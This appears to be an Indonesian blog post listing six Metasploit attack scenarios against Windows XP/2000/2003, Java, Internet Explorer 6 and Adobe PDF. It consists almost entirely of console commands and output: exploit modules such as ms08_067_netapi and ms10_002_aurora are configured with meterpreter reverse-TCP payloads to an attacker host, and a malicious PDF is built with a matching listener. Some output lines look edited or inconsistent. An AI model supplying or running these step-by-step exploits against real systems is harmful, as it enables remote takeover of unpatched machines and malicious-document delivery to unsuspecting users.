Metasploit Skenario

Aurum Radiance 07:44

Hi, saya udah jarang ngepost maaf, perkiraan lusa baru sering ngepost, well, sekarang saya akan bahas tentang beberapa skenario penyerangan menggunakan metasploit

Skenario 1 : (Target : Windows XP SP2 dan Windows XP SP3)
=================================================

msf > use windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf  exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)


Skenario 2: (Target :Windows NT 4.0 SP3 Windows 2000 Windows XP Windows 2003 (versi inggris))
=================================================

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf  exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf  exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Skenario 3: (Target : Java Rhino)

=================================================

msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(java_rhino) > set lport 4444
lport => 4444
smsf  exploit(java_rhino) > set uripath /
uripath => /
msf  exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Skenario 4 : (Target : Internet Explore 6)
=================================================

msf > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
smsf  exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf  exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf  exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(ms10_002_aurora) > set uripath /
uripath => /
msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012


Skenario 5: (Browser auto run)
note : karena saya belum gunain exploit ini jadi saya hanya bisa sebutkan syntaxnya
=================================================
cari browser auto run (search aja)
set lhost 192.168.2.104
set uripath /
exploit 

Skenario 6 : (Target : Windows (Executeable (PDF)))
=================================================
use exploit/windows/fileformat/adobe_pdf_embedded_exe 
set INFILENAME /root/Desktop/Sample.pdf 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (LHOST)
exploit 

Listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.104 (LHOST)
exploit 

sekian terima kasih
Tags

Post a Comment

0 Comments